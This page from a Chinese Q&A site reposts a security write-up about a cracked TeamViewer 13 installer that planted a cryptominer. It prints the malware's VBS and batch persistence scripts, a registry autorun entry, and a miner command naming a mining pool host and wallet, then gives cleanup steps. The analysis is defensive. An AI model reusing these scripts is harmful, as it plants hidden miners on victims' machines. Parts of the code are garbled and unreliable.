当前位置:首页 > 问答百科 > 正文内容

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)

福瑞号2023-05-12 19:26:27问答百科94

不提供TeamViewer激活码分享,建议使用官方免费版或购买正版授权。安装教程步骤详见网站提供的教程。



你下载的TeamViewer13破解版可能有毒

0×0故事背景

最近有个远程管理一下某内网服(tiao)务(ban)器(ji)的需求,映射到公网又不安全毕竟黑帽子这么多,思来想去之后还是觉得老老实实装个Teamviewer最靠谱,度娘一下发现还真的不少破解版资源可以下载,于是随意下载一个破解版准备开始操作。

0×1安装过程

先看一下文件描述信息也没有发现什么问题,就开始下一步安装了。

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图1

安装完成了功能正常,一切OK,渐渐的电脑开始卡到爆,敏感的白帽子有一种不好的预感

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图2

0×2问题排查

开始仔细的检查一下进程列表在最后发现了一个奇怪的进程,居然被植入了挖矿病毒这个也太明显了吧,也不搞点进程注入无文件攻击之类的高端技术,系统盘下面也多了不少.bat与.vbs文件。

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图3

直接结束了挖矿的进程之后又自动起来了,还是看看这些同伴里面到底写了什么玩意。

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图4

0.Servicecrsssr.vbs:

imWShellSetWShell=CreateObject("WScript.Shell")WShell.Run"%windir%winvprse.bat",0SetWShell=Nothing

1.Winprs.bat:

@EchoOffREGADDHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorer un/v"Chrome"/f/tREG_SZ/d"%windir%servicecrsssr.vbs"Exit

2.Winvpr.vbs:

imWShellSetWShell=CreateObject("WScript.Shell")WShell.Run"winprs.bat",0SetWShell=Nothing

3.Winvprse.bat:

@echooffSETLOCALEnableExtensions:starttimeout/t160/nobreakgt;NULechoofftasklist/FI"IMAGENAMEeqwmipvrse.exe"2gt;NUL|find/I/N"wmipvrse.exe"gt;NULif"%ERRORLEVEL%"=="0"gotostarttasklist/FI"IMAGENAMEeqwmipvrse.exe"2gt;NUL|find/I/N"wmipvrse.exe"gt;NULif"%ERRORLEVEL%"=="1"gotoprocessnotrunning:processnotrunningstart"""%windir%xdgaudio.vbs"gotostartexit

4.xdgaudio.vbs

DimWShell

SetWShell=CreateObject("WScript.Shell")WShell.Run"wmipvrse.exe--cpu-priority2--cpu-affinity2-acryptonight-ostratum+tcp://krb.crypto-coins.club:5555-uKjCJtxsXLAd4hUBXAUKxPSPn3L2YaAgihUUc8SQAaCfeG1QpN3kNyLyBRjRUdzmaAdYhMyoZJvUMceBuWcR3a9rnA3U4EBJ-px",0

SetWShell=Nothing

5.Wmipvrse.exe

矿池与钱包都这么出来了,看看到底挖了多少钱。

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图5

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图6

0×3逆向分析

对Wmipvrse.exe这个进程里面的东西还是感到好奇,决定还是看一看,已经加壳了不过还好是UPX的标准壳可直接脱。

CPU-minergithub上面的开源代码

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图7

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图8

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图9

0×4病毒清理

事到如此根据几个vbs与bat文件的内容,运行原理还是比较清楚了,就动手清理了。

Step1:使用PCHunter删除6个病毒母体

servicecrsssr.vbs

Winprs.bat

Winvpr.vbs

Winvprse.bat

Wmipvrse.exe

xdgaudio.vbs

Step2:清除注册表

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图10

0×5总结

1.下载软件尽量选择官方平台或者可信的第三方软件平台。

2.天下没有白吃的午餐,破解版软件里面可能含有一些让你惊喜的病毒木马后门,也许是一个大礼包呢。

3.安全无小事,日常需注意。

*本文作者:si1ence,转载自FreeBuf.COM

扫描二维码推送至手机访问。

版权声明:本文由福瑞号发布,如需转载请注明出处。

本文链接:https://www.furui.com.cn/174981.html

“teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)” 的相关文章

qq如何查找群(qq搜不到群怎么回事)

qq如何查找群(qq搜不到群怎么回事)

qq搜不到群,可能是输入的qq群号或者qq群名称不对,也有可能是你要搜索的qq群的管理员设置了禁止搜索的缘故。先确认是否输入了正确的qq群号或者qq群名,如果确认输入正确,那么很可能就是群主或管理员设置了禁止搜索,这时候如果还想要加入该群,需要该群成员拉你入群,或者让该群管理员取消禁止搜索。 确认...

司马懿是怎么死的(司马懿究竟是怎么死的)

司马懿是怎么死的(司马懿究竟是怎么死的)

司马懿字仲达,三国时期杰出的政治家、军事家、谋略家,与诸葛亮齐名,他也是西晋王朝的奠基人。司马懿自幼聪慧,深谙韬略,博古通今无所不知,曹操曾多次要求司马懿为朝廷效命,但司马懿都以重病在身,辞而不受。建安十三年(208年),曹操强征司马懿为文学椽,从此为曹操出谋划策。曹操被封为魏王后,司马懿看中曹丕...

上三门意思是什么(《白眉大侠》上三门是指哪三门)

上三门意思是什么(《白眉大侠》上三门是指哪三门)

《白眉大侠》中经常会出现上三门这样的门派,而且在这套书中上三门是名门正派,代表的是支持开封府和朝廷的正义之师。像白眉大侠徐良、玉面小达摩白云瑞都是来自于上三门。那么上三门究竟是哪三个门派?上三门武功最强的十位高手都是谁呢?上三门是指形意门、八卦门、太极门,是属于五宗之一的内家功。 白云剑客夏侯仁就是...

水浒传李师师扮演者(李师师扮演者何晴)

水浒传李师师扮演者(李师师扮演者何晴)

#水浒传解读# 水浒中的李师师扮演者何晴,骨子里的美顾盼生姿,雍容华贵又不失娴静淑雅。风韵中可谓雅俗共赏,从皇帝宋徽宗到浪子燕青,都可以从骨子里喜欢她。 我国唯一同时出演过四大名著的美女何晴,有“中国第一古典美女”的美称,她的美已然成为了四大名著的代言人,前无古人已铁板定钉。 从何晴的身上散发的阴柔...

币是什么结构(JIMF|金融科技、加密货币和央行数字货币:中国的金融结构转型)

币是什么结构(JIMF|金融科技、加密货币和央行数字货币:中国的金融结构转型)

金融科技和去中心化金融已经渗透到金融体系的各个领域,并在过去十年中提高了金融包容性。《金融科技、加密货币和央行数字货币:中国的金融结构转型》(Fintech, Cryptocurrencies, and CBDC: Financial Structural Transformation in C...

如何因材施教(如何做好因材施教)

如何因材施教(如何做好因材施教)

我们学习因材施教,要注意以下几点关键因素: 1、因材施教要从了解学生开始,老师要善于观察孩子,了解孩子心理特点,学习特点,实际水平和能力状况。 2、从学生实际出发。根据学生实际,研究教学目标的实施策略,把教学的难度、广度、进度做到适合学生的知识水平和接受能力,同时考虑学生的个...